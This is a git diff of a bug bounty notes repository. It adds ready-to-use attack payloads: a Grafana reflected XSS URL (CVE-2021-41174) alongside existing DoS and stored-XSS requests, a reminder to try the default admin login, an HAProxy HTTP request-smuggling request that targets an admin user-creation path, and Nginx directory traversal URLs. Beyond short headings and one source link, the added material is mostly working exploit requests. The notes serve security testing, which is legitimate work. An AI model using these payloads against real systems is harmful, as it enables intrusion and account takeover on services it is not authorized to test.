diff --git a/Bypass/Bypass Rate Limit.md b/Bypass/Bypass 429.md similarity index 98% rename from Bypass/Bypass Rate Limit.md rename to Bypass/Bypass 429.md index 403963d..be6f9f6 100644 --- a/Bypass/Bypass Rate Limit.md +++ b/Bypass/Bypass 429.md @@ -1,4 +1,4 @@ -# Bypass Rate Limit +# 429 Rate limit Bypass 1. Try add some custom header ``` X-Forwarded-For : 127.0.0.1 diff --git a/README.md b/README.md index 0477a1c..1617141 100644 --- a/README.md +++ b/README.md @@ -25,8 +25,8 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md) - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md) - [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md) +- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md) - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md) -- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md) - [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md) ## List CMS @@ -47,9 +47,12 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) ## Technologies +- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) +- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) - [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md) - [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md) +- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md) ## Reconnaissance - [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md) diff --git a/Technologies/Grafana.md b/Technologies/Grafana.md index 7c33a11..ed6f20c 100644 --- a/Technologies/Grafana.md +++ b/Technologies/Grafana.md @@ -1,9 +1,13 @@ # Grafana -1. CVE-2020-13379 (Denial of Service) +1. CVE-2021-41174 (Reflected XSS) +``` +/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 +``` +2. CVE-2020-13379 (Denial of Service) ``` /avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D ``` -2. CVE-2020-11110 (Stored XSS) +3. CVE-2020-11110 (Stored XSS) ``` POST /api/snapshots HTTP/1.1 Host: @@ -15,7 +19,7 @@ Connection: close {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} ``` -3. CVE-2019-15043 (Grafana Unauthenticated API) +4. CVE-2019-15043 (Grafana Unauthenticated API) ``` POST /api/snapshots HTTP/1.1 Host: @@ -27,11 +31,11 @@ Content-Type: application/json {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} ``` -4. Default Credentials +5. Default Credentials ``` Try to login using admin as username and password ``` -5. Signup Enabled +6. Signup Enabled ``` /signup ``` \ No newline at end of file diff --git a/Technologies/HAProxy.md b/Technologies/HAProxy.md new file mode 100644 index 0000000..52ceeb1 --- /dev/null +++ b/Technologies/HAProxy.md @@ -0,0 +1,15 @@ +# HAProxy +1. CVE-2021-40346 (HTTP Request Smuggling) +``` +POST /index.html HTTP/1.1 +Host: abc.com +Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: +Content-Length: 60 + +GET /admin/add_user.py HTTP/1.1 +Host: abc.com +abc: xyz +``` + +Source: +- [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/) \ No newline at end of file diff --git a/Technologies/Nginx.md b/Technologies/Nginx.md new file mode 100644 index 0000000..ee3385b --- /dev/null +++ b/Technologies/Nginx.md @@ -0,0 +1,11 @@ +# Nginx + +1. Directory traversal +``` +https://example.com/folder1../folder1/folder2/static/main.css +https://example.com/folder1../%s/folder2/static/main.css +https://example.com/folder1/folder2../folder2/static/main.css +https://example.com/folder1/folder2../%s/static/main.css +https://example.com/folder1/folder2/static../static/main.css +https://example.com/folder1/folder2/static../%s/main.css +``` \ No newline at end of file